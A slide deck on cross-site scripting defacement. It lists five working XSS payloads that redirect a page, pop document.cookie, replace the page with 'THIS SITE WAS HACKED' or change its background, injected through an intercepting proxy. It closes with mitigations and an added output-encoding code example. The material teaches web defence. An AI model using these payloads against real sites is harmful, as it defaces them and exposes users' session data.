Cross Site Scripting - Web Defacement Techniques

Published in: Technology

  1. 1. Introduction • Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. Defacing is one of the most common things an attacker does after finding a vulnerability in a website. • Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
  2. 2. Testing • The value Test is entered and captured each time using OWASP's ZAP Proxy. Once it is captured, we replace Test with our malicious code, in turn bypassing the client-side preventions the web site has in place.
  3. 3. 1 • Redirects to a hacked image outside the App Domain <script>window.location="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>
  4. 4. 2 • Adds a hacked image to the page <img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>
  5. 5. 3 • Cover full page with Hacked - in App Domain <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
  6. 6. 4 • Change background to RED - in App Domain <script>document.body.bgColor="red";</script>
  7. 7. 5 • Set the background to Hacked Image - in App Domain <script>document.body.background="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>
  8. 8. 1 Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of these characters are needed by the application, properly escaping them is enough. A non-comprehensive list of characters likely to be part of an attack vector is:
       • <> (triangular parenthesis)
       • () (parenthesis)
       • " (quotation mark)
       • & (ampersand sign)
       • ' (single apostrophe)
       • + (plus sign)
       • % (percent sign)
       • = (equals sign)
       • : (colon)
       • ` (forward tick)
       • ; (semicolon)
       • ´ (back tick)
     2 Escape all untrusted output before presenting it to the UI. Follow the rules detailed at the following link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
     3 When possible, it is recommended to enforce a specific charset encoding (using the 'Content-Type' header or a <meta> tag).
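
Mitigations 2 and 3 from the last slide, as an added example that is not part of the original slides: untrusted values are encoded for the HTML context they land in, and the response declares its charset. The function names and the http(s)-only URL allow-list are assumptions of this example; the sample inputs are constructed from the payloads on slides 4 and 6.

```javascript
// Added example: server-side output encoding for HTML text and quoted attributes.
// Function names are hypothetical, not from the slides.

// Characters from the slide's list that are significant in HTML text or attribute values.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '`': '&#x60;', '=': '&#x3D;',
};

// Encode untrusted data for element content or a QUOTED attribute value.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'`=]/g, (ch) => HTML_ENTITIES[ch]);
}

// Assumption of this example: only absolute http(s) URLs may reach src/href.
// Entity-encoding alone does not neutralise a javascript: URL.
function safeUrl(untrusted) {
  let url;
  try { url = new URL(String(untrusted)); } catch { return '#'; }
  const allowed = url.protocol === 'http:' || url.protocol === 'https:';
  return allowed ? escapeHtml(url.href) : '#';
}

// Render a comment as a server-side template would, encoding every
// untrusted field for the context it is written into.
function renderComment(author, body, avatarUrl) {
  return `<div class="comment"><img src="${safeUrl(avatarUrl)}" alt="${escapeHtml(author)}">` +
         `<p>${escapeHtml(body)}</p></div>`;
}

// Mitigation 3: declare the charset so the browser does not have to guess it.
function htmlResponseHeaders() {
  return { 'Content-Type': 'text/html; charset=utf-8' };
}

// Constructed inputs modelled on slides 4 and 6.
const SAMPLE_BODY = '<script>document.body.bgColor="red";</script>';
const SAMPLE_AUTHOR = 'x" onerror=alert(document.cookie) "';

console.log(renderComment(SAMPLE_AUTHOR, SAMPLE_BODY, 'javascript:alert(1)'));
console.log(htmlResponseHeaders());
```

The encoder covers element content and quoted attribute values only; data written into script blocks, CSS or unquoted attributes needs the context-specific rules from the cheat sheet linked on the slide.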
